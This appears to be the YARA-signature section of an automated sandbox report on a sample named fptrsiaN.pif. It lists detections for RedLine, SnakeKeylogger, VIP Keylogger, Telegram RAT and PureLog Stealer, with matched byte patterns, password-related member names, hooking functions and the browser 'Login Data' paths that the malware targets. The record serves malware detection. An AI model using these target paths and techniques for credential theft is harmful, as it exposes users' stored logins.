10.1.fptrsiaN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.3.fptrsiaN.pif.1ffcda28.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.3.fptrsiaN.pif.1ffcda28.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.3.fptrsiaN.pif.1ffcda28.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.3.fptrsiaN.pif.1ffcda28.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.3.fptrsiaN.pif.1ffcda28.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
10.3.fptrsiaN.pif.1ffcda28.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
10.3.fptrsiaN.pif.1ffcda28.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
10.2.fptrsiaN.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
6.2.fptrsiaN.pif.1f6e0000.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.fptrsiaN.pif.1f6e0000.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.fptrsiaN.pif.1f6e0000.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.fptrsiaN.pif.1f6e0000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.fptrsiaN.pif.1f6e0000.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3db5a:$a1: get_encryptedPassword 0x3db2e:$a2: get_encryptedUsername 0x3dbf2:$a3: get_timePasswordChanged 0x3db0a:$a4: get_passwordField 0x3db70:$a5: set_encryptedPassword 0x3d93d:$a7: get_logins 0x38fb8:$a10: KeyLoggerEventArgs 0x38f87:$a11: KeyLoggerEventArgsEventHandler 0x3da11:$a13: _encryptedPassword
6.2.fptrsiaN.pif.1f6e0000.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48c88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4832b:$a3: \Google\Chrome\User Data\Default\Login Data 0x48588:$a4: \Orbitum\User Data\Default\Login Data 0x48f67:$a5: \Kometa\User Data\Default\Login Data
6.2.fptrsiaN.pif.1f6e0000.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b70d:$s1: UnHook 0x3b6a9:$s2: SetHook 0x3b6e2:$s3: CallNextHook 0x3b671:$s4: _hook
9.2.Naisrtpf.PIF.21107948.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
6.2.fptrsiaN.pif.1f6e0f08.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.fptrsiaN.pif.1f6e0f08.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.fptrsiaN.pif.1f6e0f08.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.fptrsiaN.pif.1f6e0f08.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
6.2.fptrsiaN.pif.1f6e0f08.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
6.2.fptrsiaN.pif.1f6e0f08.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
6.2.fptrsiaN.pif.1f6e0f08.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
15.2.fptrsiaN.pif.30c09d46.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.30c09d46.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.fptrsiaN.pif.30c09d46.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.fptrsiaN.pif.30c09d46.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.30c09d46.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3db5a:$a1: get_encryptedPassword 0x3db2e:$a2: get_encryptedUsername 0x3dbf2:$a3: get_timePasswordChanged 0x3db0a:$a4: get_passwordField 0x3db70:$a5: set_encryptedPassword 0x3d93d:$a7: get_logins 0x38fb8:$a10: KeyLoggerEventArgs 0x38f87:$a11: KeyLoggerEventArgsEventHandler 0x3da11:$a13: _encryptedPassword
15.2.fptrsiaN.pif.30c09d46.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48c88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4832b:$a3: \Google\Chrome\User Data\Default\Login Data 0x48588:$a4: \Orbitum\User Data\Default\Login Data 0x48f67:$a5: \Kometa\User Data\Default\Login Data
15.2.fptrsiaN.pif.30c09d46.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b70d:$s1: UnHook 0x3b6a9:$s2: SetHook 0x3b6e2:$s3: CallNextHook 0x3b671:$s4: _hook
1.2.x.exe.29c0000.1.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
15.2.fptrsiaN.pif.335a0000.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.335a0000.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.fptrsiaN.pif.335a0000.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.fptrsiaN.pif.335a0000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.335a0000.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3db5a:$a1: get_encryptedPassword 0x3db2e:$a2: get_encryptedUsername 0x3dbf2:$a3: get_timePasswordChanged 0x3db0a:$a4: get_passwordField 0x3db70:$a5: set_encryptedPassword 0x3d93d:$a7: get_logins 0x38fb8:$a10: KeyLoggerEventArgs 0x38f87:$a11: KeyLoggerEventArgsEventHandler 0x3da11:$a13: _encryptedPassword
15.2.fptrsiaN.pif.335a0000.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x48c88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4832b:$a3: \Google\Chrome\User Data\Default\Login Data 0x48588:$a4: \Orbitum\User Data\Default\Login Data 0x48f67:$a5: \Kometa\User Data\Default\Login Data
15.2.fptrsiaN.pif.335a0000.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3b70d:$s1: UnHook 0x3b6a9:$s2: SetHook 0x3b6e2:$s3: CallNextHook 0x3b671:$s4: _hook
10.2.fptrsiaN.pif.24330000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fptrsiaN.pif.24330000.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fptrsiaN.pif.24330000.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fptrsiaN.pif.24330000.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.fptrsiaN.pif.24330000.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
10.2.fptrsiaN.pif.24330000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
10.2.fptrsiaN.pif.24330000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.335a0f08.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.335a0f08.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.fptrsiaN.pif.335a0f08.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.fptrsiaN.pif.335a0f08.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.335a0f08.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
15.2.fptrsiaN.pif.335a0f08.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
15.2.fptrsiaN.pif.335a0f08.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
10.2.fptrsiaN.pif.21b5ac4e.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fptrsiaN.pif.21b5ac4e.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fptrsiaN.pif.21b5ac4e.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fptrsiaN.pif.21b5ac4e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.fptrsiaN.pif.21b5ac4e.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
10.2.fptrsiaN.pif.21b5ac4e.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
10.1.fptrsiaN.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 53 88 44 24 2B 88 44 24 2F B0 85 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
10.2.fptrsiaN.pif.242d0f08.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fptrsiaN.pif.242d0f08.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fptrsiaN.pif.242d0f08.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fptrsiaN.pif.242d0f08.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.fptrsiaN.pif.242d0f08.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
10.2.fptrsiaN.pif.242d0f08.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
10.2.fptrsiaN.pif.242d0f08.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3ea52:$a1: get_encryptedPassword 0x3ea26:$a2: get_encryptedUsername 0x3eaea:$a3: get_timePasswordChanged 0x3ea02:$a4: get_passwordField 0x3ea68:$a5: set_encryptedPassword 0x3e835:$a7: get_logins 0x39eb0:$a10: KeyLoggerEventArgs 0x39e7f:$a11: KeyLoggerEventArgsEventHandler 0x3e909:$a13: _encryptedPassword
10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x49b80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x49223:$a3: \Google\Chrome\User Data\Default\Login Data 0x49480:$a4: \Orbitum\User Data\Default\Login Data 0x49e5f:$a5: \Kometa\User Data\Default\Login Data
10.2.fptrsiaN.pif.21b5ac4e.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f95a:$a1: get_encryptedPassword 0x3f92e:$a2: get_encryptedUsername 0x3f9f2:$a3: get_timePasswordChanged 0x3f90a:$a4: get_passwordField 0x3f970:$a5: set_encryptedPassword 0x3f73d:$a7: get_logins 0x3adb8:$a10: KeyLoggerEventArgs 0x3ad87:$a11: KeyLoggerEventArgsEventHandler 0x3f811:$a13: _encryptedPassword
6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4aa88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a12b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a388:$a4: \Orbitum\User Data\Default\Login Data 0x4ad67:$a5: \Kometa\User Data\Default\Login Data
6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d50d:$s1: UnHook 0x3d4a9:$s2: SetHook 0x3d4e2:$s3: CallNextHook 0x3d471:$s4: _hook
15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3c605:$s1: UnHook 0x3c5a1:$s2: SetHook 0x3c5da:$s3: CallNextHook 0x3c569:$s4: _hook
10.2.fptrsiaN.pif.21b59d46.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fptrsiaN.pif.21b59d46.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fptrsiaN.pif.21b59d46.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fptrsiaN.pif.21b59d46.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
10.2.fptrsiaN.pif.21b59d46.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f95a:$a1: get_encryptedPassword 0x3f92e:$a2: get_encryptedUsername 0x3f9f2:$a3: get_timePasswordChanged 0x3f90a:$a4: get_passwordField 0x3f970:$a5: set_encryptedPassword 0x3f73d:$a7: get_logins 0x3adb8:$a10: KeyLoggerEventArgs 0x3ad87:$a11: KeyLoggerEventArgsEventHandler 0x3f811:$a13: _encryptedPassword
10.2.fptrsiaN.pif.21b59d46.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4aa88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a12b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a388:$a4: \Orbitum\User Data\Default\Login Data 0x4ad67:$a5: \Kometa\User Data\Default\Login Data
10.2.fptrsiaN.pif.21b59d46.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d50d:$s1: UnHook 0x3d4a9:$s2: SetHook 0x3d4e2:$s3: CallNextHook 0x3d471:$s4: _hook
15.3.fptrsiaN.pif.2f0fd950.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.3.fptrsiaN.pif.2f0fd950.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.3.fptrsiaN.pif.2f0fd950.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.3.fptrsiaN.pif.2f0fd950.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.3.fptrsiaN.pif.2f0fd950.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3cc52:$a1: get_encryptedPassword 0x3cc26:$a2: get_encryptedUsername 0x3ccea:$a3: get_timePasswordChanged 0x3cc02:$a4: get_passwordField 0x3cc68:$a5: set_encryptedPassword 0x3ca35:$a7: get_logins 0x380b0:$a10: KeyLoggerEventArgs 0x3807f:$a11: KeyLoggerEventArgsEventHandler 0x3cb09:$a13: _encryptedPassword
15.3.fptrsiaN.pif.2f0fd950.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x47d80:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x47423:$a3: \Google\Chrome\User Data\Default\Login Data 0x47680:$a4: \Orbitum\User Data\Default\Login Data 0x4805f:$a5: \Kometa\User Data\Default\Login Data
15.3.fptrsiaN.pif.2f0fd950.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3a805:$s1: UnHook 0x3a7a1:$s2: SetHook 0x3a7da:$s3: CallNextHook 0x3a769:$s4: _hook
15.2.fptrsiaN.pif.30c09d46.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
15.2.fptrsiaN.pif.30c09d46.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
15.2.fptrsiaN.pif.30c09d46.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
15.2.fptrsiaN.pif.30c09d46.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
15.2.fptrsiaN.pif.30c09d46.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x3f95a:$a1: get_encryptedPassword 0x3f92e:$a2: get_encryptedUsername 0x3f9f2:$a3: get_timePasswordChanged 0x3f90a:$a4: get_passwordField 0x3f970:$a5: set_encryptedPassword 0x3f73d:$a7: get_logins 0x3adb8:$a10: KeyLoggerEventArgs 0x3ad87:$a11: KeyLoggerEventArgsEventHandler 0x3f811:$a13: _encryptedPassword
15.2.fptrsiaN.pif.30c09d46.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x4aa88:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x4a12b:$a3: \Google\Chrome\User Data\Default\Login Data 0x4a388:$a4: \Orbitum\User Data\Default\Login Data 0x4ad67:$a5: \Kometa\User Data\Default\Login Data
15.2.fptrsiaN.pif.30c09d46.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x3d50d:$s1: UnHook 0x3d4a9:$s2: SetHook 0x3d4e2:$s3: CallNextHook 0x3d471:$s4: _hook
6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
